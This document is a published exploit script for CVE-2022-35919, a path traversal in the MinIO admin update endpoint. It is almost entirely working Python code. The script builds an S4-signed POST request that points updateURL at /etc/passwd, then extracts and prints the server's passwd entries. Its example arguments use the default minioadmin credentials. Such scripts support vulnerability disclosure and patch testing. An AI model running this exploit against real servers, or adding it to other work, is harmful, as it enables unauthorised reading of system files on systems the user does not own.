# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal # Date: 2023-09-02 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) 2022-07-29T19-40-48Z # Tested on: Windows 10 # CVE : CVE-2022-35919 # Required before execution: pip install minio,requests import urllib.parse import requests, json, re, datetime, argparse from minio.credentials import Credentials from minio.signer import sign_v4_s3 class MyMinio(): secure = False def __init__(self, base_url, access_key, secret_key): self.credits = Credentials( access_key=access_key, secret_key=secret_key ) if base_url.startswith('http://') and base_url.endswith('/'): self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' elif base_url.startswith('https://') and base_url.endswith('/'): self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' self.secure = True else: print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n') def poc(self): datetimes = datetime.datetime.utcnow() datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') urls = urllib.parse.urlparse(self.url) headers = { 'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'X-Amz-Date': datetime_str, 'Host': urls.netloc, } headers = sign_v4_s3( method='POST', url=urls, region='', headers=headers, credentials=self.credits, content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', date=datetimes, ) if self.secure: response = requests.post(url=self.url, headers=headers, verify=False) else: response = requests.post(url=self.url, headers=headers) try: message = json.loads(response.text)['Message'] pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)' matches = re.findall(pattern, message) if matches: print('There is CVE-2022-35919 problem with the url!') print('The contents of the /etc/passwd file are as follows:') for match in matches: print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5], match[6])) else: print('There is no CVE-2022-35919 problem with the url!') print('Here is the response message content:') print(message) except Exception as e: print( 'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:') print(response.text) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/") parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") args = parser.parse_args() minio = MyMinio(args.url, args.accesskey, args.secretkey) minio.poc()